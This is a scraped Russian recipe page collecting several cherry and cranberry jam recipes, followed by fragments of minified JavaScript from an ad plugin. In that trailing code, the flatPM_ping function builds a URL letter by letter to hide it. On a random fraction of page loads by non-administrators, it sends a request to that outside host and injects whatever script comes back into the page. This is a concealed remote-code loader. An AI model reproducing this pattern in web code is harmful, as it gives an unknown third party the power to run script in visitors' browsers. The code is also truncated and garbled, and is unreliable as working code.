Вишнево-клюквенное варенье рецепт

Вишнево-клюквенное варенье рецепт

Ингредиенты

ИНГРИДИЕНТЫ МАССА КАЛОРИЙНОСТЬ (ккал. на 100 гр.)
Клюква свежая 350 г.
Вишни (с удаленными косточками) 1 кг. 49
Малиновый или красносмородиновый сироп 120 г.
Лимонный сок 2 шт. 31
Вода 250 г.
Сахар белый 1,3 кг. 374

Пошаговый рецепт приготовления Вишнево-клюквенное варенье с фото

А готовится сладость так:

    Ягоды клюквы переберите, промойте, просушите.

Переложите клюкву в чашу, измельчите кухонным комбайном или блендером. Получившуюся массу переложите в толстую емкость, сюда же добавьте вишенки, влейте сироп, сок лимона, воду, накройте емкость крышкой, варите все вместе на слабом огне полчаса.

Затем в смесь из ягод всыпьте сахар, варите еще 10 минут.

  • Потом снимите емкость с огня, снимите пену, дайте сладости настояться, а затем разлейте лакомство в стерилизованные стеклянные емкости, закрутите крышками, остудите и поставьте в темную комнату. Вот и все, вишнево-клюквенное варенье готово!
  • Видеорецепт Вишнево-клюквенное варенье

    Варенье с желатином

    А еще можно побаловать своих домочадцев невероятно вкусным, домашним и ароматным вареньем с желатином!

    Итак, для того чтобы приготовить лакомство по этому рецепту вам понадобится:

    Ингредиенты:
    сахар-1 кг.;
    вишня-1 кг.;
    желатин-25 г.;
    палочка корицы-2 шт.;
    какао-3 ст.л.

    А готовится сладость так:

    Сразу ягоды переложите в емкость, сюда же влейте воду, пусть содержимое стоит 20 минут. Потом переберите вишни, удалите косточки, переложите их в емкость, всыпьте сюда же сахар, прикройте полотенцем, отставьте в сторонку на всю ночь.

Далее в получившуюся вишневую массу добавьте какао с корицей. Отправьте вариться лакомство на 5 минут, потом дайте сладости остыть несколько часов, а затем проварите еще пару раз.

  • А теперь в получившуюся смесь всыпьте желатин, помешайте, через 20 минут отправьте на огонь, вскипятите, варить не нужно. Далее разлейте сладость в стерилизованные баночки, закатайте крышками и все, вкуснейшее домашнее варенье готово!
  • Варенье из клюквы – 6 рецептов на зиму

    Светлана Яковлева • 06.07.2019

    Северная ягода растет в болотистых местах, но превосходит многие ягоды по количеству полезных веществ и витаминов. Варенье из клюквы обладает приятным кисло-сладким вкусом. Его можно подавать к чаю в розеточках, а можно использовать как сладкий соус к оладьям, блинчикам и запеканкам. Густое клюквенное варенье подойдет для начинок в пирожках и тортах.

    Варенье из клюквы на зиму

    Самый простой рецепт, с которым справится даже начинающая хозяйка, а вкус получается потрясающим.

    Ингредиенты:

    • клюква – 2 кг.;
    • сахарный песок – 2 кг.

    Приготовление:

    1. Ягоды осторожно переберите, чтобы не повредить кожицу. Удалите веточки, листочки и плохие ягодки.
    2. Поместите их в дуршлаг и промойте большим количеством проточной воды.
    3. Поместите ягоды в кастрюлю или таз для варки и засыпьте их сахарным песком.
    4. Оставьте на несколько часов. За это время ягода выделит сок, который пропитает сахар.
    5. Поставьте емкость на газ и доведите до кипения.
    6. Снимите пену, уменьшите нагрев до минимального и варите около четверти часа.
    7. Периодически помешивайте массу и снимайте пену.
    8. Готовое варенье разлейте по чистым и сухим баночкам, закупорьте крышками и дайте полностью остыть.

    Остывшие банки уберите в подходящее для хранения место.

    Варенье из клюквы без варки

    Этот способ позволит сохранить максимальное количество полезных веществ в вашей заготовке.

    Ингредиенты:

    • клюква – 1 кг.;
    • сахарный песок – 1 кг.

    Приготовление:

    1. Переберите клюку, и промойте под струей воды, переложив её в дуршлаг.
    2. Подсушите ягоды, а затем переложите в кастрюлю.
    3. Засыпьте половиной всего объема сахара и дайте ему раствориться в ягодном соке.
    4. В это время баночки и крышки нужно тщательно помыть, и простерилизовать.
    5. Переложите ягоды с сиропом в банки, оставляя пространство не менее двух сантиметров.
    6. Засыпьте сверху сахарным песком и закупорьте банки при помощи специальной машинки.
    7. Хранить такие заготовки нужно в холодильнике, а перед употреблением перемешать сахарную корочку с основной массой.

    Такая заготовка идеально подойдет для приготовления витаминного, жаропонижающего напитка при простуде, нужно просто растворить ложку варенья в горячей воде.

    Варенье из клюквы пятиминутка

    Такое варенье готовится очень быстро и прекрасно хранится всю зиму.

    Ингредиенты:

    • клюква – 1 кг.;
    • сахарный песок – 2 кг.;
    • вода – 250 мл.

    Приготовление:

    1. Ягоды нужно перебрать, промыть в дуршлаге и обдать кипятком.
    2. Оставьте ягоды, чтобы жидкость полностью стекла, а в это время приготовьте сироп.
    3. Вскипятите в кастрюле нужное количество воды, постепенно подсыпайте сахар, чтобы он полностью растворился.
    4. Когда сироп станет прозрачным и достаточно густым, снимите пену и положите ягоды.
    5. Поварите несколько минут, помешивая и снимая пену.
    6. Готовое варенье разлейте по баночкам и закупорьте крышками.
    7. После полного остывания переместите заготовки в подходящее для хранения место.
    8. Этот способ позволяет сохранить полезные вещества, ведь варенье подвергается минимальной тепловой обработке.

    Использовать такое варенье лучше как топинг для блинчиков или оладьев.

    Варенье из клюквы с апельсинами

    Очень вкусное лакомство с цитрусовыми нотками получается при добавлении апельсинов.

    Ингредиенты:

    • клюква – 1,5 кг.;
    • сахарный песок – 3 кг.;
    • апельсины – 1,5 кг.

    Приготовление:

    1. Переберите и промойте клюкву проточной водой.
    2. Апельсины тщательно вымойте, вытрите насухо, и нарежьте вместе с кожурой, удаляя семена.
    3. Измельчите подготовленные продукты при помощи блендера или мясорубки.
    4. Переложите массу в кастрюлю, добавьте сахарный песок и проварите несколько минут.
    5. Снимайте пену и помешивайте, чтобы варенье не пригорело.
    6. Разлейте в подготовленные баночки, закупорьте крышками и дайте полностью остыть.
    7. Храните в прохладном и темном месте.

    Такой простой рецепт варенья из клюквы с апельсинами прекрасно подходит для выпечки.

    Варенье из клюквы с айвой и миндалем

    Этот рецепт отличается еще и тем, что вместо сахара используют натуральный мёд.

    Ингредиенты:

    • клюква – 1 кг.;
    • мёд – 3 кг.;
    • айва – 1 кг.;
    • орехи – 200 гр.

    Приготовление:

    1. Клюкву переберите и промойте под струей воды, оставьте в дуршлаге, чтобы стекла вода.
    2. Переложите в кастрюлю, влейте стакан воды и дайте закипеть.
    3. Убавьте нагрев, и поварите ягоды минут десять.
    4. Слейте жидкость, а ягоды пробейте блендером до однородной массы.
    5. Орехи переберите, немного подсушите на сухой сковородке и очистите от кожицы.
    6. Айву помойте. Очистите от кожуры, разрежьте на четвертинки.
    7. Удалите сердцевинки, и нарежьте тонкими ломтиками.
    8. В кастрюле или тазу для варки варенья разогрейте мёд до жидкого состояния.
    9. Добавьте в мёд орехи и дольки айвы.
    10. Варите на минимальном огне, помешивая и снимая пену около получаса.
    11. Дайте полностью остыть и пропитаться сиропом, а затем снова включите газ и добавьте клюквенное пюре.
    12. Варите еще четверть часа, снимая пену.
    13. Готовое лакомство перелейте в банки, закупорьте крышками и укутайте теплым одеялом.
    14. После остывания отправьте банки в погреб.

    Миндаль можно заменить фундуком или грецкими орехами.

    Варенье из клюквы с корицей

    Этот ароматный десерт подойдет для дополнения домашней выпечки.

    Ингредиенты:

    • клюква – 1,5 кг.;
    • сахарный песок – 1 кг.;
    • корица.

    Приготовление:

    1. Клюкву перебрать, удаляя палочки и плохие ягоды, положить в дуршлаг и промыть под струей воды.
    2. Сложите ягоды в миску, и засыпьте сахарным песком.
    3. Оставьте на пару часов, чтобы выделившийся сок пропитал сахар, а затем переложите в кастрюлю, дайте закипеть, снимите пену и варите на медленном огне около часа.
    4. Варенье нужно помешивать и снимать пену.
    5. В конце процесса добавьте в кастрюлю молотую корицу. Достаточно четверти чайной ложки, но можно уменьшить или увеличить её количество по своему вкусу.
    6. Если у вас есть только палочка корицы, то её нужно добавить в кастрюлю сразу после закипания варенья, а перед тем, как разлить его по банкам вынуть.
    7. Перелейте горячее варенье в банки, закупорьте крышками и храните в погребе.

    Такое лакомство подойдет для начинки пирогов и пирожков или как соус к творожной запеканке.

    Какой бы рецепт вы для себя не выбрали, результат порадует вас вкусом, да и цвет варенья получается насыщенным и красивым. Дети обожают сладкое лекарство от простуды и жара, а блинчики или оладьи, политые таким вкусным соусом, полюбят все члены вашей семьи.

    Густым клюквенным вареньем можно промазывать бисквитные коржи домашних пирогов или использовать как дополнение к свежим яблокам или другим фруктам, которые вы собираетесь использовать в начинку для пирожков. Приготовьте несколько баночек на зиму. Приятного вам аппетита!

    Варенье из клюквы на зиму – 12 самых простых и вкусных рецептов

    Добрый день, дорогие читатели! Продолжаем серию статей про заготовки на зиму. Сегодня предлагаю сварить вкусное и полезное варенье из клюквы.

    Так как ягоды клюквы – это настоящая кладезь витаминов, то и варенье будет хорошим лекарством для поднятия иммунитета и борьбы с сезонными простудами.

    Варенье из клюквы на зиму по классическому рецепту

    Такое нежное варенье хорошо подойдет для начинки пирожков, пирогов, тортиков или можно подавать с блинами или оладушками.

    • 1 кг. – свежих ягод
    • 1 кг. – песка сахарного

    1. Плоды внимательно перебрать, вымыть под холодной водой, переложить в большую миску (кастрюлю), пересыпать сахаром. Дать ягодам постоять 3-4 часа. За это время они хорошо пустят сок, а заодно пропитаются сахаром.

    2. Далее ставим кастрюлю на плиту, доводим массу до кипения на среднем огне, все время помешивая. Как только ягодная масса закипит, уменьшаем огонь, томим еще 15-20 минут.

    3. Готовое лакомство разливаем по стерильным банкам, укупориваем.

    Калорийность на 100 гр. – 244 ккал

    Видео рецепт: Варенье из клюквы без сахара

    Клюквенное варенье без варки

    Варенье из клюквы без варки

    Такое варенье без термической обработки сохраняет максимум витаминов, а значит оно самое полезное.

    • По 1 кг. – свежих ягод с сахаром

    1. Свежие ягодки вымыть, просушить на полотенцах или оставить в дуршлаге на 15-20 минут, чтобы стекла хорошо вода.

    2. Плоды измельчить толкушкой или через мясорубку, засыпать сахар, перемешать, оставить на 1-1,5 часа, чтобы сахар растворился.

    3. Раскладываем лакомство по простерилизованным банкам, сверху засыпаем сахаром, чтобы получилась защитная прослойка около 1 см., закрываем крышками.

    4. Хранить такой десерт надо в холодильнике. После открывания банки, сахарную корочку перемешайте с клюквенным вареньем.

    Видео рецепт: Варенье из клюквы с апельсином без варки

    С яблоками и грецкими орехами

    Варенье из клюквы с яблоками и грецкими орехами

    Десерт получается очень вкусный и очень полезный. Приготовьте обязательно. не пожалеете!

    • 2 стакана – фильтрованной воды
    • 200-250 гр. – ядер грецких орехов
    • 1 кг. – твердых яблок
    • 0,8 кг. – свежих ягод
    • 2 кг. – песка сахарного

    1. Яблоки и ягоды хорошо промыть. Яблоки очистить, нарезать дольками.

    2. Ягоды пересыпать в большую кастрюлю, добавить 0,5 стакана холодной воды, поварить 15-20 минут, измельчить блендером.

    3. В отдельной кастрюле сварить сладкий сироп из сахара и оставшейся воды.

    4. Грецкие орехи мелко порубить ножом.

    5. В ягодную массу добавить яблоки, сахарный сироп, орехи, все перемешать, варить около часа на минимальном огне, помешивая и снимая сладкую пенку.

    6. Горячее лакомство разлить по стеклянным банкам, укупорить прокипяченными крышками.

    Калорийность на 100 гр. – 224 ккал

    Видео рецепт: Варенье из клюквы, яблок и орехов

    С медом, яблоками и грецкими орехами

    Варенье из клюквы с яблоками, медом и грецкими орехами

    • По 1 кг. – свежих ягод и яблок
    • 200-250 гр. – ядер грецких орехов
    • 3 кг. – натурального меда
    • 250 мл. – отфильтрованной воды

    1. Ягоду промыть, перебрать, переложить в большую миску или кастрюлю, добавить воды.

    2. Поставить кастрюлю на плиту, довести ягодную массу до кипения на среднем огне, потомить на небольшом огне 15-20 минут.

    3. Аккуратно воду слить, а ягоды перетереть толкушкой или ложкой через сито.

    4. Яблоки очистить, нарезать тонкими дольками. Орехи измельчить ножом.

    5. В большой таз поместить весь мед, немного нагреть, добавить яблочные дольки, ягодную массу, измельченные орехи.

    6. Лакомство варить на минимальном огне около часа, иногда помешивая, затем разложить по стерильным стеклянным банкам, закатать.

    Из замороженных ягод

    Варенье из замороженной клюквы

    • 0,7 кг. – замороженной клюквы
    • 3 стакана – песка сахарного
    • 1 стакан – свежевыжатого апельсинового сока
    • 1 стакан – чистой воды
    • 1 ч. ложечка – молотой корицы

    1. Такой десерт приготовить очень просто. В большую кастрюлю (миску) засыпать размороженную ягоду, добавить сахар, апельсиновый сок, корицу, чистую воду.

    2. Поставить кастрюлю с подготовленной массой на средний огонь, довести до кипения, затем уменьшить мощность и проварить еще 20-25 минут. Не забывайте иногда помешивать, чтобы не подгорел сахар.

    3. Готовое варенье измельчить погружным блендером, поварить еще 5 минут, разлейте по банкам.

    “Пятиминутка”

    Рецепт варенья из клюквы «Пятиминутка»

    • 1 кг. – спелых ягод
    • 2 кг. – песка сахарного
    • 1 стакан – воды

    1. Ягоды внимательно перебрать, хорошо вымыть, облить крутым кипятком, оставить в дуршлаге, чтобы стекла вода.

    2. Теперь варим сироп. В большую кастрюлю вливаем воду, добавляем постепенно, небольшими порциями сахар, помешиваем. Когда сахар полностью раствориться, поварите еще 3-5 минут, добавьте клюкву, доведите массу до кипения.

    3. Готовое лакомство разлейте по стерильным банкам и герметично закатайте.

    Видео рецепт: Клюквенное варенье “Пятиминутка”

    С апельсином

    Рецепт варенья из клюквы с апельсином

    Получается очень вкусно, рекомендую попробовать именно этот рецепт.

    • По 1 кг. – свежей клюквы с апельсинами
    • 2 кг. – песка сахарного

    1. Клюкву хорошо перебрать, вымыть, просушить.

    2. Апельсины вымыть, разрезать на кусочки вместе с кожурой, удалить косточки.

    3. Подготовленные продукты измельчить в блендере или мясорубке.

    4. В полученную массу добавить две килограмма сахара, все тщательно перемешать.

    5. Довести нежную массу до кипения, проварить еще 5-8 минут. Осталось разлить по стерильным стеклянным банкам, укупорить.

    Калорийность на 100 гр. – 138 ккал

    Варенье из клюквы

    Признаюсь, я люблю, чтобы клюквенное варенье было кислым. Сколько ни пробовала магазинное варенье – всё не то – очень сладкое! А я люблю, чтобы чувствовался вкус настоящих ягод. Когда я была маленькая “правильное” варенье мне готовила бабушка. Но сейчас она совсем старенькая и почти не занимается заготовками. Этот рецепт – мой экспромт. Как-то проходя мимо рынка я увидела развесную клюкву и идея сварить варенье пришла сама собой.

    Ингредиенты для «Варенье из клюквы»:

    • Клюква — 1 кг
    • Сахар — 1 кг
    • Вода — 1.5 стак.

    Время приготовления: 90 минут

    Рецепт «Варенье из клюквы»:

    Перебранную и промытую клюкву положить в кастрюлю, влить полстакана воды и варить под крышкой до тех пор, пока ягоды не станут мягкими и не начнут лопаться. После чего ягоды размять и протереть через сито.
    Я использовала толкушку для пюре, т. к мне нравится варенье с кожурой от ягод. Можно использовать блендер. В данном случае – всё зависит от того, как вам нравится.

    В другой кастрюле приготовить сахарный сироп. Для этого в сахар добавить стакан воды и довести до кипения, помешивая, чтобы сахар полностью растворился.

    В кастрюлю с сиропом переложить протёртую клюкву, перемешать и варить на медленном огне около часа.

    Из кг ягод у меня вышло 5 пол литровых баночек варенья. Варенье хорошо стоит.
    Если нравится послаще можно готовить в пропорции 1:2.5 – кг ягод и 2.5 кг сахара.
    Надеюсь, найдутся любители такого варенья!

    Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

    Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

    Поделиться рецептом с друзьями:

    Нравятся наши рецепты?
    BB-код для вставки:
    BB-код используется на форумах
    HTML-код для вставки:
    HTML код используется в блогах, например LiveJournal

    Как это будет выглядеть?

    Другие варианты рецепта

    Варенье из клюквы

    • 7
    • 109
    • 1931

    Похожие рецепты

    Варенье из кизила с ягодами (без косточек)

    • 37
    • 155
    • 17254

    Слива в густом сиропе “Сладкие дольки”

    • 171
    • 778
    • 14998

    Мусс сливово-яблочный с коньяком и грецкими орехами

    • 46
    • 58
    • 4750

    Варенье из санберри или черного паслена

    • 29
    • 23
    • 53106

    Джем из смородины по-польски

    • 23
    • 85
    • 4575

    Айвовое варенье с лавром и перцем

    • 15
    • 99
    • 1472

    Сливовое варенье по-грузински

    • 89
    • 487
    • 11711

    Янтарное желе из крыжовника на зиму

    • 51
    • 419
    • 11299

    Живое варенье из смородины

    • 44
    • 278
    • 2997

    Комментарии и отзывы

    5 января 2019 года yaloza1969 #

    1 декабря 2016 года lemonywater #

    1 декабря 2016 года Суслик Маринка #

    2 декабря 2016 года KateDr # (автор рецепта)

    2 декабря 2016 года KateDr # (автор рецепта)

    30 ноября 2016 года subsidii66 #

    30 ноября 2016 года KateDr # (автор рецепта)

    Оставить комментарий или отзыв о рецепте

    Зарегистрироваться, или войти если вы уже регистрировались.

    Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

    Ссылка на основную публикацию
    Adblock
    detector
    ":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
    '+c+"
    "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
    Закрыть через '+o.how.outgoing.timer_count+"
    ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
    '+c+"
    ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
    '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
    "],tbody:[1,"","
    "],colgroup:[2,"","
    "],col:[3,"","
    "],tr:[2,"","
    "],td:[3,"","
    "],th:[3,"","
    "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
    '+a+" через "+o+'
    '+n+'
    ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
    ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};